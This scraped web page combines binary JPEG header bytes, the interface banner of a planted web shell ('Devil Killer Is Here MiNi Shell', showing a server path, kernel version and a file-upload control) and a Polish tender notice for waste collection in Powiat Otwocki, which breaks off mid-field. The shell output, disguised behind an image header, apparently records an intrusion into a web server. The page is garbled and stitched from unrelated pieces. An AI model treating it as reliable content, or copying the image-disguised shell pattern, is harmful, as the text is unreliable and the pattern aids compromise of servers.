JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211203/0029895802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług odbioru odpadów z budynków Starostwa Powiatowego w Otwocku i jednostek organizacyjnych Powiatu Otwockiego oraz przekazanie ich do Instalacji Przetwarzania Odpadów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Otwocki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268681</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Górna 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/886,zamowienia-o-wartosci-powyzej-130-000-zl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Powiat Otwocki</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">5322008671</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Górna</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">22 778 1 300</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.bip.powiat-otwocki.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług odbioru odpadów z budynków Starostwa Powiatowego w Otwocku i jednostek organizacyjnych Powiatu Otwockiego oraz przekazanie ich do Instalacji Przetwarzania Odpadów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8f3d51d6-542b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00298958</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001754/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wywóz odpadów komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.powiat-otwocki.pl/886,zamowienia-o-wartosci-powyzej-130-000-zl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php?s=3e47582343b49b9d9e1e4c6a3191075a65625218</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć ofertę zobowiązany jest założyć konto na platformie do komunikacji elektronicznej EPZ pod adresem:<br/>https://www.soldea.pl/epz/epz/<br/>Oznacza konieczność akceptacji regulaminu platformy EPZ i zapoznania się z instrukcjami korzystania z konta na platformie.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej EPZ:<br/>http://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php?s=3e47582343b49b9d9e1e4c6a3191075a65625218<br/>Ofertę składa się tylko za pośrednictwem platformy EPZ.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: zamowienia@powiat-otwocki.pl . Wejście na platformę poprzez link: https://www.bip.powiat-otwocki.pl/886,zamowienia-o-wartosci-powyzej-130-000-zl. Wykonawca zamierzający korzystać z platformy EPZ zobowiązany jest zapoznać się z aktualnymi instrukcjami<br/>użytkowników platformy EPZ dostępnym pod adresem; https://www.soldea.pl/epz/epz/regulamin/php.<br/>Sposób korzystania z platformy EPZ został przedstawiony w zakładce „FAQ” oraz zamieszczonych na platformie filmikach instruktażowych dostępny po zalogowaniu się do platformy. Za pomocą tego kanału komunikacji elektronicznej Wykonawca składa ofertę, formularz cenowy, oświadczenia o<br/>niewykluczeniu,oświadczenie o spełnieniu warunków wraz ew. pełnomocnictwem. Aktualne wymagania techniczne związane z korzystaniem z Platformy EPZ wskazane są na stronie internetowej logowania i<br/>rejestracji Platformy pod adresem: https://www.soldea.pl/epz/epz/ System operacyjny Windows/Mac/Linux w aktualnie wspieranych wersjach. Uwaga: Windows 7 nie jest wspierany od 14 stycznia 2020.Przeglądarka internetowa IE od 10 w górę / Edge / FireFox / Chrome / Opera / Safari,w<br/>aktualnych wersjach.2 Włączona obsługa kodu JavaScript 3.Sprawne połączenie internetowe, upload min.2Mb/s. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 20 MB w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne z zastrzeżeniem formatów , o których mowa w art. 66 ust 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>Maksymalny rozmiar pojedynczego plik, który można załączyć na Platformie EZP to 20 MB. Jeżeli plik podpisany jest podpisem zaufanym to wielkość pliku łącznie z podpisem nie może przekraczać 10 MB.<br/>Zamawiający, określając dopuszczalne formaty danych w jakich Wykonawca może przedłożyć dokumenty lub oświadczenia, korzysta z katalogu formatów wskazanych w zał nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r.w sprawie Krajowych Ram lnteroperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Za pośrednictwem platformy EPZ można przesyłać wiele pojedynczych plików we wskazanym formacie lub plików archiwum ZIP zawierający wiele pojedynczych plików, w tym wypadku w dowolnym formacie. Zamawiający dopuszcza możliwość komunikowania za pomocą maila: zamowienia@powiat-otwocki.pl. Szczegółowe informacje dotyczące informacji o<br/>środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami opisane są w Dziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Starosta Otwocki z siedzibą w Otwocku Górna 13;<br/>05-400 Otwock<br/>• Administrator wyznaczył inspektora, Panią Darię Barnicką, mail: iod@powiat-otwocki.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie,<br/>np. nazwa, numer/ prowadzonym w trybie wskazanym w ogłoszeniu.<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 , art 74 ustawy z dnia11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę , której dane osobowe dotyczą z uprawnieniami do sprostowania lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania , o którym mowa w art.18 ust1 rozporządzenia 206/679 nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SAI.272.1.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Świadczenie usług odbioru odpadów komunalnych/stałych niesegregowanych, segregowanych i bioodpadów z budynków Starostwa Powiatowego w Otwocku i jednostek organizacyjnych Powiatu Otwockiego oraz przekazanie ich do Instalacji Przetwarzania Odpadów ”.<br/><br/>Zamawiający, działa w imieniu własnym oraz na podstawie podpisanego Porozumienia, w imieniu i na rzecz niżej wymienionych jednostek: <br/>1.	Powiatowy Urząd Pracy w Otwocku, ul. Górna 11, 05-400 Otwock<br/>2.	Powiatowe Centrum Pomocy Rodzinie w Otwocku ul. Komunardów 10, 05-402 Otwock<br/>Punkt poboru: ul. Mickiewicza 43/47, 05-402 Otwock<br/>3.	Powiatowym Centrum Pomocy Rodzinie w Otwocku <br/>	- Dom Dla Dzieci nr 1 w Otwocku przy ul. Prądzyńskiego 1 <br/>	Punkt odbioru: ul. Prądzyńskiego 1,05-400 Otwock<br/>	- Dom Dla Dzieci nr 2 w Otwocku przy ul.Ujejskiego14 <br/>	Punkt odbioru: ul. Ujejskiego 14, 05-400 Otwock<br/>	- Dom Dla Dzieci nr 3 w Otwocku przy ul. Cieszyńskiej 9 <br/>	Punkt odbioru: ul. Cieszyńska 9, 05-400 Otwock<br/>4.	Dom Pomocy Społecznej, ul. Marii Konopnickiej 17, 05-400 Otwock<br/>5.	Zarząd Dróg Powiatowych ul. Boh.Westerplatte 36, 05-480 Karczew<br/>6.	Dom Pomocy Społecznej „Wrzos” ul. Zagłoby 8, 05-400 Otwock <br/>7.	Oświata Powiatowa w Otwocku ul. Poniatowskiego 10, 05-400 Otwock<br/>8.	Powiatowy Młodzieżowy Dom Kultury im. Michała Andriollego w Otwocku, ul. Poniatowskiego 10, 05-400 Otwock<br/>9.	Powiatowa Poradnia Psychologiczno-Pedagogiczną w Otwocku, ul. Majowa 17/19, 05-400 Otwock<br/>10.	Liceum Ogólnokształcące Nr 1 im. K.I.Gałczyńskiego w Otwocku, ul. Filipowicza 9, 05-400 Otwock<br/>11.	Zespół Szkół Nr 1 w Otwocku ul. Słowackiego 4/10, 05-400 Otwock <br/>12.	Zespół Szkół nr 2 im. Marii Skłodowskiej – Curie w Otwocku, ul. Pułaskiego 7, 05-400 Otwock<br/>13.	Zespół Szkół Ekonomiczno – Gastronomicznych im. Stanisława Staszica w Otwocku ul. Konopnickiej 3, 05-400 Otwock<br/>14.	Specjalny Ośrodek Szkolno-Wychowawczym nr 2 w Otwocku, ul. Literacka 8, 05-400 Otwock<br/>15.	Specjalny Ośrodek Szkolno-Wychowawczym Nr 1 im. Marii Konopnickiej w Otwocku, ul. Majowa 17/19, 05-400 Otwock <br/>16.	Młodzieżowym Ośrodek Socjoterapii „Jędruś” w Józefowie, ul. Główna 10, 05-410 Józefów.<br/><br/>Pkt I<br/>Odbieranie nieczystości komunalnych/stałych niesegregowanych oraz ich transport i przekazanie do Instalacji Przetwarzania Odpadów, oznaczonych w katalogu odpadów kodem: 20 03 01<br/><br/>Wywóz nieczystości stałych w dni robocze (poniedziałek – piątek) w godz. 6:00-15:00 zgodnie z harmonogramem zawartym w tabeli w Dziale III SWZ.<br/><br/>1. Przedmiot zamówienia obejmuje:<br/>2. Do obowiązków Wykonawcy należy:<br/> 1) wyposażyć obiekty, w których będzie następował wywóz odpadów w:<br/>a) pojemniki do wywozu nieczystości stałych typ: PA-1100 o pojemności 1100 litrów (nieuszkodzone, z pokrywą); w ilościach zawartych w załączniku nr 1do SIWZ, w terminie 3 dni od dnia zawarcia niniejszej Umowy.<br/>b) Wykonawca oddaje Zamawiającemu do bezpłatnego używania, a Zamawiający przyjmuje do używania pojemniki, o których mowa w pkt. 1, na czas obowiązywania niniejszej Umowy.<br/>2) Wykonawca zobowiązuje się do:<br/> a) okresowej, tj. raz na miesiąc dezynfekcji pojemników,<br/> b) utrzymania należytego porządku wokół pojemników sprzątanie terenu wokół kontenerów i pojemników po ich opróżnieniu w przypadku gdy doszło do jego zabrudzenia wskutek odbioru odpadów.<br/>3. Wykonawca zobowiązany jest zabezpieczyć odpady przed wysypaniem, rozwianiem lub wyciekiem w trakcie odbioru i transportu. W przypadku wysypania, rozwiania lub wycieku Wykonawca zobowiązany jest do natychmiastowego usunięcia skutków zaistniałych zdarzeń. <br/>4. Po wygaśnięciu Umowy Zamawiający wyda Wykonawcy bez uprzedniego wezwania pojemniki, o których mowa w ust. 1, w stanie wynikającym ze zwykłego zużycia rzeczy. Zwrot nastąpi w terminie uzgodnionym między Stronami, nie krótszym niż 3 dni od zakończenia obowiązywania Umowy i zostanie potwierdzony protokołem zdawczo – odbiorczym.<br/>Wykonawca zobowiązany jest realizować odbiór odpadów z częstotliwością określoną przez Zamawiającego, zgodnie z opracowanym harmonogramem odbierania opadów, biorąc pod uwagę, że odbiór odpadów nie może odbywać się w dni ustawowo wolne od pracy. Harmonogram powinien być sporządzony zgodnie z następującymi wytycznymi:<br/>1)	Odbiór odpadów, który realizowany jest co najmniej raz w tygodniu z danej nieruchomości, powinien przypadać na ten sam dzień tygodnia lub dni tygodnia,<br/>2)	Odbiór odpadów, który realizowany jest rzadziej niż raz w tygodniu z danej nieruchomości, powinien przypadać na ten sam dzień lub dni miesiąca,<br/>3) W przypadku, gdy ustalony dzień tygodnia lub miesiąca dla odbioru odpadów przypada w dniu ustawowo wolnym od pracy, Wykonawca zapewni odbiór odpadów w następnym dniu nie będącym dniem ustawowo wolnym od pracy.<br/>4) Zapewnić regularność i powtarzalność odbierania odpadów.<br/><br/>Pkt II<br/>Odbieranie nieczystości komunalnych/stałych niesegregowanych, segregowanych i bioodpadów oraz ich transport i przekazanie do Instalacji Przetwarzania Odpadów, oznaczonych w katalogu odpadów kodem: 20 03 01, 20 02 01, 15 01 02, 15 01 01,<br/><br/>Wywóz nieczystości stałych w dni robocze (poniedziałek – piątek) w godz. 6:00-15:00 zgodnie z harmonogramem zawartym w tabeli w Dziale III SWZ . <br/>1.	Przedmiot zamówienia obejmuje:<br/>1)	Odbiór odpadów o kodzie: 20 03 01 ich transport i przekazanie do instalacji przetwarzających wymienione odpady.<br/>2)	Odbiór odpadów o kodzie 15 01 01 ich transport i przekazanie do instalacji przetwarzających wymienione odpady.<br/>3)	Odbiór odpadów o kodzie15 01 02 ich transport i przekazanie do instalacji przetwarzających wymienione odpady<br/>4)	Odbiór bioodpadów o kodzie 20 01 01, transport i przekazanie do instalacji komunalnych przetwarzających wymienione odpady.<br/>2. Do obowiązków Wykonawcy należy:<br/> 1) wyposażyć obiekty, w których będzie następował wywóz odpadów w:<br/>a)	pojemniki do wywozu nieczystości pojemności 1100 litrów(nieuszkodzone, z pokrywą);<br/>b)	pojemniki do wywozu nieczystości o pojemności 120 litrów (nieuszkodzone z pokrywą),<br/>c)	pojemniki do wywozu nieczystości o pojemności 240 litrów (nieuszkodzone z pokrywą)<br/>d)	pojemniki do wywozu nieczystości o pojemności 2,5 m³ (nieuszkodzone)<br/>e)	pojemniki na odpady bio o pojemności 120 litrów<br/>w ilościach zawartych w formularzu cenowym (część II), w terminie 3 dni od dnia zawarcia niniejszej Umowy.<br/>f) Wykonawca oddaje Zamawiającemu do bezpłatnego używania, a Zamawiający przyjmuje do używania pojemniki, o których mowa w pkt. 1, na czas obowiązywania niniejszej Umowy.<br/>2) Wykonawca zobowiązuje się do:<br/> a) okresowej, tj. raz na miesiąc dezynfekcji pojemników;<br/> b) utrzymania należytego porządku wokół pojemników sprzątanie terenu wokół kontenerów i pojemników po ich opróżnieniu w przypadku gdy doszło do jego zabrudzenia wskutek odbioru odpadów.<br/>3. Wykonawca zobowiązany jest zabezpieczyć odpady przed wysypaniem, rozwianiem lub wyciekiem w trakcie odbioru i transportu. W przypadku wysypania, rozwiania lub wycieku Wykonawca zobowiązany jest do natychmiastowego usunięcia skutków zaistniałych zdarzeń.<br/>4. Po wygaśnięciu Umowy Zamawiający wyda Wykonawcy bez uprzedniego wezwania pojemniki, o których mowa w ust. 1, w stanie wynikającym ze zwykłego zużycia rzeczy. Zwrot nastąpi w terminie uzgodnionym między Stronami, nie krótszym niż 3 dni od zakończenia obowiązywania Umowy i zostanie potwierdzony protokołem zdawczo – odbiorczym.<br/>5. Wykonawca zobowiązany jest realizować odbiór odpadów z częstotliwością określoną przez Zamawiającego, zgodnie z opracowanym harmonogramem odbierania opadów, biorąc pod uwagę, że odbiór odpadów nie może odbywać się w dni ustawowo wolne od pracy. Harmonogram powinien być sporządzony zgodnie z następującymi wytycznymi:<br/>1)	Odbiór odpadów, który realizowany jest co najmniej raz w tygodniu z danej nieruchomości, powinien przypadać na ten sam dzień tygodnia lub dni tygodnia,<br/>2)	Odbiór odpadów, który realizowany jest rzadziej niż raz w tygodniu z danej nieruchomości, powinien przypadać na ten sam dzień lub dni miesiąca,<br/>3) W przypadku, gdy ustalony dzień tygodnia lub miesiąca dla odbioru odpadów przypada w dniu ustawowo wolnym od pracy, Wykonawca zapewni odbiór odpadów w następnym dniu nie będącym dniem ustawowo wolnym od pracy Zapewnić regularność i powtarzalność odbierania odpadów.<br/>6. Zamawiający w razie wprowadzenia nauki zdalnej w ww. placówkach zleci odbiór odpadów na zgłoszenie telefonicznie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy 